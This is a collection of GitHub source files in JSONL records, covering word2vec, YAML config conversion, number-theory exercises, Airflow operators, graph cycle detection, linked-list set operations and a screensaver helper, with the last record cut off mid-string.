+{"seq_id":"42693925222","text":"from gensim.models import word2vec\r\n\r\n#\r\n# s1=['今天','天气','真好']\r\n# s2=['今天','天气','很好']\r\n\r\ns1 = [1, 2, 3]\r\ns2 = [1, 2, 4]\r\n\r\nseqs = [s1, s2]\r\n\r\nmodel = word2vec.Word2Vec(seqs, vector_size=10, min_count=1)\r\nprint(model.wv.most_similar(1, topn=3))\r\n","repo_name":"HuichuanLI/GraphNeuralNetWork","sub_path":"GNN/s24_word2vec.py","file_name":"s24_word2vec.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"31060073345","text":"import os\n\nRUAMEL_YAML_INSTALLED = False\ntry:\n import ruamel.yaml as yaml\n RUAMEL_YAML_INSTALLED = True\nexcept:\n print('ERROR: module ruamel.yaml not found')\n print('')\n print('Please install ruamel.yaml using the command:')\n print('sudo pip3 install ruamel.yaml')\n print('')\n RUAMEL_YAML_INSTALLED = False\n import yaml\n\n\nimport collections\nfrom collections import OrderedDict\n\n\nyaml_version = '1.1'\nindent_spaces = 4\nstore_raw_output = False\t\t\t# Only for testing, otherwise False\n\n\ndef is_ruamelyaml_installed():\n\n return RUAMEL_YAML_INSTALLED\n\n\n# ==================================================================================\n# config loader from config.py modified for parsing to yaml\n#\n\n\ndef _strip_quotes(string):\n string = string.strip()\n # check if string starts with ' or \", and end with it, if they are the only one\n if len(string) >= 2 and string[0] in ['\"', \"'\"] and string[0] == string[-1] and string.count(string[0]) == 2:\n string = string[1:-1] # remove them\n return string\n\n\ndef _handle_multiline_string(string):\n if len(string) > 0 and string.find('\\n') > -1 and string[0] != '|':\n string = '|\\n' + string\n return string\n\n\ndef parse_for_convert(filename=None, conf_code=None, config=None):\n valid_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@*'\n valid_set = set(valid_chars)\n if config is None:\n config = collections.OrderedDict()\n item = config\n offset = 0\n lastline_was_comment = False\n last_comment_nr = 0\n\n if filename != None:\n print(\"- parsing '{}'\".format(os.path.basename(filename)), end=\"\")\n with open(filename, 'r', encoding='UTF-8') as f:\n lines = iter(f.readlines())\n elif isinstance(conf_code, str):\n lines = conf_code.splitlines()\n else:\n return config\n\n linenu = 0\n parents = collections.OrderedDict()\n parent = collections.OrderedDict()\n if 1 == 1:\n for raw in lines:\n linenu += 1\n line = raw.lstrip('\\ufeff') # remove BOM\n\n multiline = []\n if line.rstrip().endswith('\\\\'):\n i = 0\n while line.rstrip().endswith('\\\\'):\n multiline.append( line.rstrip().rstrip('\\\\').strip() )\n i += 1\n linenu += 1\n line = next(lines, '').lstrip()\n line = '\\n'.join(multiline) + '\\n'+line.strip()\n lastline_was_comment = False\n\n if (len(multiline) == 0) or (line[0] == '#'):\n if len(multiline) == 0:\n comment_in_line = line.find('#')\n comment = line.partition('#')[2].strip()\n if comment_in_line > -1 and comment == '':\n comment = '>**<'\n line = line.partition('#')[0].strip()\n # inline comment\n if (line != '') and (comment != '') and line.find('[') == -1:\n attr, __, value = line.partition('=')\n if (\"'\" in line) or (\"|\" in line):\n comment = attr.strip() + ': ' + comment\n else:\n line = line + ' ## ' + comment\n comment = ''\n else:\n comment = line\n line = ''\n if comment != '':\n while (comment != '') and (comment[0] == '#'):\n comment = comment[1:].strip()\n if comment != '':\n comment = comment.replace('\\t', ' ')\n if 'comment' in item.keys():\n if lastline_was_comment:\n if last_comment_nr > 0:\n item['comment'+str(last_comment_nr)] = _handle_multiline_string(item['comment'+str(last_comment_nr)] + '\\n' + _strip_quotes(comment))\n else:\n item['comment'] = _handle_multiline_string(item['comment'] + '\\n' + _strip_quotes(comment))\n else:\n i = 1\n while 'comment'+str(i) in item.keys():\n i += 1\n item['comment'+str(i)] = _handle_multiline_string(_strip_quotes(comment))\n last_comment_nr = i\n else:\n# logger.info(\"comment: '{}'\".format(comment))\n item['comment'] = _handle_multiline_string(_strip_quotes(comment))\n last_comment_nr = 0\n lastline_was_comment = True\n\n if line == '':\n continue\n if line[0] == '[': # item\n lastline_was_comment = False\n #\n comment_in_line = line.find('#')\n comment = line.partition('#')[2].strip()\n if comment_in_line > -1 and comment == '':\n comment = '>**<'\n line = line.partition('#')[0].strip()\n #\n brackets = 0\n level = 0\n closing = False\n for index in range(len(line)):\n if line[index] == '[' and not closing:\n brackets += 1\n level += 1\n elif line[index] == ']':\n closing = True\n brackets -= 1\n else:\n closing = True\n if line[index] not in valid_chars + \"'\":\n print()\n print(\"ERROR: Problem (1) parsing '{}' invalid character in \\nline {}: {}. \\nValid chars: {}\".format(os.path.basename(filename), linenu, line, valid_chars))\n return config\n if brackets != 0:\n print()\n print(\"ERROR: Problem parsing '{}' unbalanced brackets in line {}: {}\".format(filename, linenu, line))\n return config\n #\n if comment_in_line > -1:\n print()\n print(\"ERROR: Problem parsing '{}' \\nunhandled comment {} in \\nline {}: {}. \\nValid chars: {}\".format(os.path.basename(filename), comment, linenu, line, valid_chars))\n #\n name = line.strip(\"[]\")\n name = _strip_quotes(name)\n if level - offset == 1:\n if name not in config:\n config[name] = collections.OrderedDict()\n item = config[name]\n parents = collections.OrderedDict()\n parents[level] = item\n else:\n if level - 1 not in parents:\n offset = level - 1\n if name not in config:\n config[name] = collections.OrderedDict()\n item = config[name]\n parents = collections.OrderedDict()\n parents[level] = item\n else:\n parent = parents[level - 1]\n if name not in parent:\n parent[name] = collections.OrderedDict()\n item = parent[name]\n parents[level] = item\n\n else: # attribute\n lastline_was_comment = False\n attr, __, value = line.partition('=')\n comm = ''\n if '##' in value:\n value, __, comm = value.partition('##')\n value = _strip_quotes(value)\n value = value + ' ## ' + comm.strip()\n# print(\"= attr >{}<, value >{}<, comment >{}<\".format(attr, value, comm))\n if not value:\n continue\n attr = attr.strip()\n if not set(attr).issubset(valid_set):\n print()\n print(\"line: '{}'\".format(line))\n print(\"ERROR: Problem (2) parsing '{}' invalid character in line {}: {}. Valid characters are: {}\".format(filename, linenu, attr, valid_chars))\n continue\n if '|' in value:\n item[attr] = [_strip_quotes(x) for x in value.split('|')]\n else:\n svalue = _handle_multiline_string(_strip_quotes(value))\n try:\n ivalue = int(svalue)\n item[attr] = ivalue\n except:\n item[attr] = svalue.replace('\\t', ' ')\n\n return config\n\n\n# ##################################################################################\n# YAML handling routines\n#\n\ndef _yaml_save_roundtrip(filename, data):\n \"\"\"\n Dump yaml using the RoundtripDumper and correct linespacing in output file\n \"\"\"\n\n sdata = yaml.dump(data, Dumper=yaml.RoundTripDumper, version=yaml_version, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True)\n\n ldata = sdata.split('\\n')\n rdata = []\n for index, line in enumerate(ldata):\n # Fix for ruamel.yaml handling: Reinsert empty line before comment of next section\n if len(line.lstrip()) > 0 and line.lstrip()[0] == '#':\n indentcomment = len(line) - len(line.lstrip(' '))\n indentprevline = len(ldata[index-1]) - len(ldata[index-1].lstrip(' '))\n if indentprevline - indentcomment >= 2*indent_spaces:\n rdata.append('')\n rdata.append(line)\n # Fix for ruamel.yaml handling: Remove empty line with spaces that have been inserted\n elif line.strip() == '' and line != '':\n if ldata[index-1] != '':\n rdata.append(line)\n else:\n rdata.append(line)\n\n sdata = '\\n'.join(rdata)\n if sdata[0] == '\\n':\n sdata =sdata[1:]\n\n with open(filename+'.yaml', 'w', encoding='utf8') as outfile:\n outfile.write( sdata )\n\n\n\ndef yaml_save(filename, data):\n \"\"\"\n ***Converter Special ***\n\n Save contents of an OrderedDict structure to a yaml file\n\n :param filename: name of the yaml file to save to\n :param data: OrderedDict to save\n \"\"\"\n\n sdata = convert_yaml(data)\n\n print(\", saving to '{}'\".format(os.path.basename(filename)+'.yaml'))\n if store_raw_output == True:\n with open(filename+'_raw.yaml', 'w', encoding='UTF-8') as outfile:\n outfile.write( sdata )\n\n # Test if roundtrip gives the same result\n data = yaml.load(sdata, yaml.RoundTripLoader)\n _yaml_save_roundtrip(filename, data)\n\n\ndef convert_yaml(data):\n \"\"\"\n ***Converter Special ***\n\n Convert data structure to yaml format\n\n :param data: OrderedDict to convert\n :return: yaml formated data\n \"\"\"\n\n ordered = (type(data).__name__ == 'OrderedDict')\n if ordered:\n sdata = _ordered_dump(data, Dumper=yaml.SafeDumper, version=yaml_version, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True, default_flow_style=False)\n else:\n sdata = yaml.dump(data, Dumper=yaml.SafeDumper, indent=indent_spaces, block_seq_indent=2, width=32768, allow_unicode=True, default_flow_style=False)\n sdata = _format_yaml_dump(sdata)\n\n return sdata\n\n\ndef _format_yaml_dump(data):\n \"\"\"\n ***Converter Special ***\n\n Format yaml-dump to make file more readable\n (yaml structure must be dumped to a stream before using this function)\n | Currently does the following:\n | - Add an empty line before a new item\n\n :param data: string to format\n\n :return: formatted string\n \"\"\"\n\n data = data.replace('\\n\\n', '\\n')\n ldata = data.split('\\n')\n rdata = []\n\n for index, line in enumerate(ldata):\n if len(line) > 0:\n # Handle inline-comments from converter\n if line.find('##') > -1 and line.find(\": '\") > -1 and line[-1:] == \"'\":\n line = line.replace('##', '#')\n line = line.replace(\": '\", \": \")\n line = line[:-1]\n\n # Handle comments from converter\n if line.find('comment') > -1 and line.find(':') > line.find('comment'):\n# print('comment-line>', line, '<')\n indent = len(line) - len(line.lstrip(' '))\n if ldata[index+1][-1:] == ':':\n indent = len(ldata[index+1]) - len(ldata[index+1].lstrip(' '))\n if line.find(': \"|') > -1:\n line = line[:-1]\n line = line.replace(': \"|', ': |')\n else:\n line = line.replace(': ', ': |\\\\n', 1)\n# print('# ' + line[line.find(\"|\\\\n\")+3:])\n line = \" \"*indent + '# ' + line[line.find(\"|\\\\n\")+3:]\n line = line.replace('>**<', '')\n line = line.replace('\\\\n', '\\n'+\" \"*indent + '# ')\n\n # Handle newlines for multiline string-attributes ruamel.yaml\n if line.find(': \"|') > -1 and line[-1:] == '\"' and line.find('\\\\n') > -1:\n indent = len(line) - len(line.lstrip(' ')) + indent_spaces\n line = line[:-1]\n line = line.replace(': \"|', ': |')\n line = line.replace('\\\\n', '\\n'+\" \"*indent)\n\n rdata.append(line)\n\n\n ldata = rdata\n rdata = []\n for index, line in enumerate(ldata):\n if len(line.lstrip()) > 0 and line.lstrip()[0] == '#' and ldata[index+1][-1:] == ':':\n rdata.append('')\n rdata.append(line)\n\n # Insert empty line before section (key w/o a value)\n elif line[-1:] == ':':\n if not (len(ldata[index-1].lstrip()) > 0 and ldata[index-1].lstrip()[0] == '#'):\n # no empty line before list attributes\n if ldata[index+1].strip()[0] != '-':\n rdata.append('')\n rdata.append(line)\n else:\n rdata.append(line)\n else:\n rdata.append(line)\n\n fdata = '\\n'.join(rdata)\n if fdata[0] == '\\n':\n fdata = fdata[1:]\n return fdata\n\n\ndef _ordered_dump(data, stream=None, Dumper=yaml.Dumper, **kwds):\n \"\"\"\n Ordered yaml dumper\n Use this instead ot yaml.Dumper/yaml.SaveDumper to get an Ordereddict\n\n :param stream: stream to write to\n :param Dumper: yaml-dumper to use\n :**kwds: Additional keywords\n\n :return: OrderedDict structure\n \"\"\"\n\n # usage example: ordered_dump(data, Dumper=yaml.SafeDumper)\n class OrderedDumper(Dumper):\n pass\n def _dict_representer(dumper, data):\n return dumper.represent_mapping(\n yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,\n data.items())\n OrderedDumper.add_representer(OrderedDict, _dict_representer)\n return yaml.dump(data, stream, OrderedDumper, **kwds)\n\n\n","repo_name":"smarthomeNG/smarthome","sub_path":"lib/item_conversion.py","file_name":"item_conversion.py","file_ext":"py","file_size_in_byte":14969,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"70"}
+{"seq_id":"28540872205","text":"def is_palindrome(n):\n ''''\n -determina daca numarul dat este palindrom sau nu\n Input:\n -paramtru: n (de tip int)\n Output:\n -va returna True, daca n este palindrom, sau False, in caz contrar(de tip bool)\n '''\n copie=n\n invers=0\n while copie:\n invers=invers*10+copie%10\n copie=copie//10\n if invers == n:\n return True\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(1221) == True\n assert is_palindrome(3453) == False\n assert is_palindrome(565) == True\n assert is_palindrome(717) == True\n assert is_palindrome(9807) == False\n assert is_palindrome(10401) == True\n assert is_palindrome(1232) == False\n\n\ntest_is_palindrome()\n\n\ndef verificare_prim(n):\n if n == 1:\n return False\n if n==2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, n // 2 + 1, 2):\n if n % i == 0:\n return False\n return True\n\n\ndef is_superprime(n):\n ''''\n -deteremina daca un numar este superprim sau nu\n Input:\n -parametru: n (de tip intreg)\n Output:\n -va returna True, daca n este superprim, sau False, in caz contrar(de tip bool)\n '''\n copie = n\n verificare = 1\n #presupunem ca numarul dat este superprim\n while copie:\n if not verificare_prim(copie):\n verificare=0\n break\n copie=copie//10\n if verificare==1:\n return True\n return False\n\n\ndef test_is_superprime():\n assert is_superprime(124) == False\n assert is_superprime(233) == True\n assert is_superprime(1290) == False\n assert is_superprime(239) == True\n assert is_superprime(14) == False\n\n\ntest_is_superprime()\n\n\ndef get_largest_prime_below(n):\n '''\n -determina ultimul numar prim mai mic decat numarul n dat\n Input\n -parametru n(de tip intreg)\n Output\n -nr_prim:ultimul numar prim mai mic decat numarul n dat\n '''\n nr_prim=n-1\n ok=False\n if n<=2:\n return None\n while not ok:\n if verificare_prim(nr_prim):\n ok=True\n break\n nr_prim=nr_prim-1\n return nr_prim\n\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(25) == 23\n assert get_largest_prime_below(18) == 17\n assert get_largest_prime_below(36) == 31\n assert get_largest_prime_below(135) == 131\n assert get_largest_prime_below(76) == 73\n\ntest_get_largest_prime_below()\n\ndef main():\n while True:\n print(\"1.Determina daca un numar dat este palindrom.\")\n print(\"2.Determina daca un numar dat este superprim.\")\n print(\"3.Determina ultimul numar prim mai mic decat un numar dat.\")\n print(\"x.Iesire\")\n optiune=input(\"Dati optiunea:\")\n if optiune==\"1\":\n numar=int(input(\"Dati numar:\"))\n if is_palindrome(numar):\n print(\"Numarul dat este palindrom.\")\n else:\n print(\"Numarul dat nu este palindrom.\")\n elif optiune==\"2\":\n numar=int(input(\"Dati numar:\"))\n if is_superprime(numar):\n print(\"Numarul dat este superprim.\")\n else:\n print(\"Numarul dat nu este superprim.\")\n elif optiune==\"3\":\n numar = int(input(\"Dati numar:\"))\n nrprim=get_largest_prime_below(numar)\n if nrprim:\n print(\"Ultimul numar prim mai mic decat numarul dat este \",nrprim)\n else:\n print(\"Nu exista!\")\n elif optiune==\"x\":\n print(\"Meniul se va inchide.\")\n break\n else:\n print(\"Optiune inexistenta. Reincercati!\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"AP-MI-2021/lab-2-nutubianca","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34202133381","text":"class Solution:\n def sortArrayByParity(self, nums: List[int]) -> List[int]:\n b = []\n q = []\n for i in nums :\n if i%2 == 0 :\n b.append(i)\n else :\n q.append(i)\n\n return b+q\n \n # A.sort(key = lambda x : x%2) as even number remainder will be 0 and for odd it is 1 , so sort it .","repo_name":"pradyumnac26/Leetcode_Problems","sub_path":"905-sort-array-by-parity/905-sort-array-by-parity.py","file_name":"905-sort-array-by-parity.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"10671920596","text":"#####################################################################################\n#\n#\n# \tOperator Converter for Airflow Transformation\n# \n#\tAuthor: Sam Showalter\n#\tDate: October 3, 2018\n#\n#####################################################################################\n\n\n#####################################################################################\n# External Library and Module Imports\n#####################################################################################\n\n# System and OS\nimport os\nimport sys\n\n#Operator converter\nimport pandas as pd\n\n#Time \nfrom datetime import datetime, timedelta\n\n#String conversion for dictionaries\nimport json\nimport inspect\n\n#####################################################################################\n# Class and Constructor\n#####################################################################################\n\n\ndef evaluation_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tpreds = ti.xcom_pull(task_ids = params['model_id'])\n\ty_test = ti.xcom_pull(key = 'y_test')\n\n\treturn params['func'](y_test, preds, **params['params'])\n\ndef merge_metrics_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tmetrics_dict = {params['model']: {}}\n\n\tfor task_id in params['merge_ids']:\n\t\tmetric = ti.xcom_pull(task_ids = task_id)\n\t\tmetrics_dict[params['model']][task_id] = metric\n\t\t\n\treturn metrics_dict\n\ndef merge_data_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\tdata = ti.xcom_pull(key = params['split'])\n\n\tpersist_cols = []\n\n\tfor task_id in params['merge_ids']:\n\t\ttask_data = ti.xcom_pull(task_ids = task_id, key = 'return_value')\n\n\t\tif isinstance(task_data, pd.DataFrame):\n\t\t\tpersist_cols += list(task_data.columns)\n\t\t\tdata = pd.concat([data, task_data], axis = 1)\n\t\telif isinstance(task_data, pd.Series):\n\n\t\t\tpersist_cols.append(task_data.name)\n\t\t\tdata[task_data.name] = task_data.values\n\n\t#Only persist mentioned\n\tdata = data.loc[:,persist_cols + params['pass_through_cols']]\n\n\tti.xcom_push(key = params['split'], value = data)\n\ndef bulk_data_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\n\tdata = ti.xcom_pull(key = params['split'])\n\n\tif params['split'] == 'train':\n\t\tdata = params['func'](data, **params['params'])\n\t\tartifact = None\n\t\tif isinstance(data, tuple):\n\t\t\tartifact = data[1]\n\t\t\tdata = data[0]\n\t\t\t\n\t\t\n\t\tti.xcom_push(key = 'artifact', value = artifact)\n\t\tti.xcom_push(key = params['split'], value = data)\n\n\n\telif params['split'] == 'test':\n\t\ttrain_artifacts = ti.xcom_pull(key = 'artifact', \n\t\t\t\t\t\t\t\t\ttask_ids = kwargs['task']\\\n\t\t\t\t\t\t\t\t\t\t\t\t.task_id\\\n\t\t\t\t\t\t\t\t\t\t\t\t.replace('test','train'))\n\t\tif train_artifacts:\n\t\t\tti.xcom_push(key = params['split'],\n\t\t\t\t\t\t value = params['func'](data, \n\t\t\t\t\t\t\t\t\tprefit = train_artifacts, \n\t\t\t\t\t\t\t\t\t**params['params']))\n\t\telse:\n\t\t\tti.xcom_push(key = params['split'], \n\t\t\t\t\t\t\tvalue = params['func'](data,\n\t\t\t\t\t\t\t\t**params['params']))\n\n\telse:\n\t\traise ValueError(\"Invalid data source: {}. Check your inputs\".format(params['split']))\n\t\n\n\ndef col_data_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\tdata = None\n\n\t#Get data based on inheritance or not\n\t#Data pulled in is either train or test slice\n\tif not params['inherits']:\n\t\tdata = ti.xcom_pull(key = params['split'])\n\t\tdata = data.loc[:, params['column_data_id']]\n\telse:\n\t\tdata = ti.xcom_pull(task_ids = params['column_data_id'], \n\t\t\t\t\t\t\t\t key = 'return_value') \n\n\tif params['split'] == 'train':\n\t\tres = params['func'](data, **params['params'])\n\t\tartifact = None\n\t\tif isinstance(res, tuple):\n\t\t\tartifact = res[1]\n\t\t\tres = res[0]\n\t\t\t\n\t\tti.xcom_push(key = 'artifact', value = artifact)\n\t\treturn res\n\n\telif params['split'] == 'test':\n\t\ttrain_artifacts = ti.xcom_pull(key = 'artifact', task_ids = kwargs['task']\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t.task_id\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t.replace('test','train'))\n\t\tif train_artifacts:\n\t\t\treturn params['func'](data, \n\t\t\t\t\t\t\t\t\tprefit = train_artifacts, \n\t\t\t\t\t\t\t\t\t**params['params'])\n\t\telse:\n\t\t\treturn params['func'](data, \n\t\t\t\t\t\t\t\t\t**params['params'])\n\n\telse:\n\t\traise ValueError(\"Invalid data source: {}. Check your inputs\".format(params['split']))\n\t\n\ndef fit_operation(params, dag, **kwargs):\n\t#if not _is_fitted(params['model']):\n\tti = kwargs['ti']\n\n\tX_train = ti.xcom_pull(key = \"X_train\")\n\ty_train = ti.xcom_pull(key = \"y_train\")\n\n\tmodel = params['model'](**params['params'])\n\tmodel.fit(X_train, y_train)\n\n\treturn model\n\ndef read_data_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tdata = params['func'](params['filepath'], **params['params'])\n\n\tti.xcom_push(key = 'data', value = data)\n\n\ndef predict_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\n\tX_test = ti.xcom_pull(key = \"X_test\")\n\n\tmodel = ti.xcom_pull(task_ids = params['model'])\n\t\n\tpredictions = model.predict(X_test)\n\n\treturn predictions\n\n\ndef split_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tdata = ti.xcom_pull(key = 'data')\n\n\ttrain, test, target = params['func'](data, **params['params'])\n\n\tti.xcom_push(key = 'train', value = train)\n\tti.xcom_push(key = 'test', value = test)\n\tti.xcom_push(key = 'target', value = target)\n\tti.xcom_push(key = 'split_method', value = params['func'].__name__)\n\ndef model_split_operation(params, dag, **kwargs):\n\t\"\"\"\n\tsplits model based on target later\n\t\"\"\"\n\tti = kwargs['ti']\n\n\ttrain = ti.xcom_pull(key = 'train')\n\ttest = ti.xcom_pull(key = 'test')\n\ttarget = ti.xcom_pull(key = 'target')\n\n\tX_train = train.loc[:,train.columns != target]\n\ty_train = train.loc[:,target]\n\tX_test = test.loc[:,test.columns != target]\n\ty_test = test.loc[:,target]\n\n\tti.xcom_push(key = 'X_train', value = X_train)\n\tti.xcom_push(key = 'y_train', value = y_train)\n\tti.xcom_push(key = 'X_test', value = X_test)\n\tti.xcom_push(key = 'y_test', value = y_test)\n\ndef k_fold_operation(func, params, dag, **kwargs):\n\tpass\n\ndef void_operation(func, params, dag, **kwargs):\n\n\treturn func(data, **params)","repo_name":"SamShowalter/airbender","sub_path":"airbender/airflow/op_converter.py","file_name":"op_converter.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"4701035035","text":"# -*- coding: utf-8 -*-\n\"\"\"\n判断一个有向图是否存在环\n有一个有向图,每个元素代表一个边,元素的第一个值为父节点,第二个值为子节点\n如果任意一个节点往子节点走下去又能回到当前节点则存在环,实现函数,判断是否存在环。\n[{A,B}, {B,C}, {A,C}] 无环\n[{A,B}, {B,C}, {A,C}, {C, A}] 有环\n\"\"\"\nimport re\n\n\ndef transform(input):\n _input = input.upper()\n _input = re.sub(\"[^A-Z]\", \"\", _input)\n _result = []\n for i in range(0, len(_input), 2):\n f = _input[i]\n s = _input[i + 1]\n _result.append((f, s))\n return _result\n\n\ndef dsf(input, current, loop):\n if loop[-1][1] == current[0]:\n loop.append(current)\n # 有环,则返回成功标致\n if loop[-1][1] == loop[0][0]:\n return True\n\n if len(input) == 0 and len(loop) > 1:\n loop.pop()\n\n for j, single in enumerate(input):\n res = dsf(input[j + 1:] + input[:j], single, loop)\n # 这里很关键,需要把后面的递归结果传到前面\n if res:\n return True\n # 如果递归结束,还没有检测到,则返回False\n return False\n\n\ndef detect(input):\n _input = transform(input)\n result = []\n # 每个元素都使用‘深度优先搜索’检测是否存在环,并记录结果\n for i, single in enumerate(_input):\n loop = [single]\n input_single = _input[:i] + _input[i+1:]\n result.append(dsf(input_single, single, loop))\n # '''\n # DEGUB\n for j, res in enumerate(result):\n # 查看具体哪个元素不能找到环\n if res is False:\n print(_input[j])\n # '''\n # 有一个元素不存在环,则整个图不存在环\n if False in result:\n return False\n else:\n return True\n\n\nif __name__ == \"__main__\":\n # example = input()\n example = '[{A,B},{B,C},{c,a},{d,a},{a,C},{C,B}]'\n result = detect(example)\n","repo_name":"seven-linglx/algorithm","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72284682465","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 03:01:23 2020\n\n@author: anunay.aatipamula\n\"\"\"\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def __repr__(self):\n return str(self.value)\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def __str__(self):\n cur_head = self.head\n out_string = \"\"\n while cur_head:\n out_string += str(cur_head.value) + \" -> \"\n cur_head = cur_head.next\n return out_string\n\n\n def append(self, value):\n\n if self.head is None:\n self.head = Node(value)\n return\n\n node = self.head\n while node.next:\n node = node.next\n\n node.next = Node(value)\n \n def to_list(self):\n node = self.head\n ll = list()\n while node is not None:\n ll.append(node.value)\n node = node.next\n return ll\n \n\n def size(self):\n size = 0\n node = self.head\n while node:\n size += 1\n node = node.next\n\n return size\n\ndef union(llist_1, llist_2):\n # Your Solution Here\n union = LinkedList()\n set1 = set(llist_1.to_list())\n set2 = set(llist_2.to_list())\n set_union = list(set1.union(set2))\n for value in set_union:\n union.append(value)\n return union\n\ndef intersection(llist_1, llist_2):\n # Your Solution Here\n intersection = LinkedList()\n set1 = set(llist_1.to_list())\n set2 = set(llist_2.to_list())\n set_intersection = list(set1.intersection(set2))\n for value in set_intersection:\n intersection.append(value)\n \n return intersection\n\n\n# Test case 1\nlinked_list_1 = LinkedList()\nlinked_list_2 = LinkedList()\n\nelement_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]\nelement_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]\n\nfor i in element_1:\n linked_list_1.append(i)\n\nfor i in element_2:\n linked_list_2.append(i)\n\nprint(union(linked_list_1, linked_list_2))\n# 32 -> 65 -> 2 -> 35 -> 3 -> 4 -> 6 -> 1 -> 9 -> 11 -> 21 ->\nprint(intersection(linked_list_1, linked_list_2))\n# 4 -> 21 -> 6 ->\n\n# Test case 2\nlinked_list_3 = LinkedList()\nlinked_list_4 = LinkedList()\n\nelement_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]\nelement_2 = [1, 7, 8, 9, 11, 21, 1]\n\nfor i in element_1:\n linked_list_3.append(i)\n\nfor i in element_2:\n linked_list_4.append(i)\n\nprint(union(linked_list_3, linked_list_4))\n# 65 -> 2 -> 35 -> 3 -> 4 -> 6 -> 1 -> 7 -> 8 -> 9 -> 11 -> 21 -> 23 ->\nprint(intersection(linked_list_3, linked_list_4))\n#\n\n# Test case 3\nlinked_list_5 = LinkedList()\nlinked_list_6 = LinkedList()\n\nelement_1 = [22, 7, 4, 35, 6, 65, 6, 4, 3, 23]\nelement_2 = [1, 7, 8, 65, 11, 21, 1]\n\nfor i in element_1:\n linked_list_5.append(i)\n\nfor i in element_2:\n linked_list_6.append(i)\n\nprint(union(linked_list_5, linked_list_6))\n# 65 -> 1 -> 35 -> 4 -> 3 -> 6 -> 7 -> 8 -> 11 -> 21 -> 22 -> 23 ->\nprint(intersection(linked_list_5, linked_list_6))\n# 65 -> 7 ->\n\n\n# Edge Cases:\n# Test case 4\nlinked_list_7 = LinkedList()\nlinked_list_8 = LinkedList()\n\nelement_1 = []\nelement_2 = [1, 7, 8]\n\nfor i in element_1:\n linked_list_7.append(i)\n\nfor i in element_2:\n linked_list_8.append(i)\n\nprint(union(linked_list_7, linked_list_8))\n# 8 -> 1 -> 7 ->\nprint(intersection(linked_list_7, linked_list_8))\n#\n\n# Test case 5\nlinked_list_9 = LinkedList()\nlinked_list_10 = LinkedList()\n\nelement_1 = []\nelement_2 = []\n\nfor i in element_1:\n linked_list_9.append(i)\n\nfor i in element_2:\n linked_list_10.append(i)\n\nprint(union(linked_list_9, linked_list_10))\n#\nprint(intersection(linked_list_9, linked_list_10))\n#\n","repo_name":"anunay999/udacity-nd","sub_path":"Data Structures - ND/Show me the Data Structure/union_intersection.py","file_name":"union_intersection.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73060011426","text":"import random\n\nfrom piwall2.broadcaster.ffprober import Ffprober\nfrom piwall2.config import Config\nfrom piwall2.configloader import ConfigLoader\nfrom piwall2.directoryutils import DirectoryUtils\nfrom piwall2.logger import Logger\n\nclass ScreensaverHelper:\n\n __is_loaded = False\n __screensavers = None\n\n def __init__(self):\n self.__logger = Logger().set_namespace(self.__class__.__name__)\n self.__load_config_if_not_loaded()\n\n def choose_random_screensaver(self):\n if len(ScreensaverHelper.__screensavers) <= 0:\n return None\n return random.choice(ScreensaverHelper.__screensavers)\n\n def __load_config_if_not_loaded(self):\n if ScreensaverHelper.__is_loaded:\n return\n\n self.__logger.info(\"Loading screensaver metadata...\")\n screensaver_config = Config.get('screensavers', [])\n ffprober = Ffprober()\n ScreensaverHelper.__screensavers = []\n path_prefix = DirectoryUtils().root_dir + '/assets/screensavers/'\n for screensaver_metadata in screensaver_config:\n video_path = path_prefix + screensaver_metadata['video_file']\n ffprobe_metadata = ffprober.get_video_metadata(video_path, ['height'])\n height = int(ffprobe_metadata['height'])\n if ConfigLoader().is_any_receiver_dual_video_output() and height > 720:\n self.__logger.warning(f'Not adding video [{video_path}] to screensavers because its resolution ' +\n f'was too high for a dual output receiver ({height} is greater than 720p).')\n continue\n ScreensaverHelper.__screensavers.append({\n 'video_path': video_path,\n 'height': height,\n })\n self.__logger.info(\"Done loading screensaver 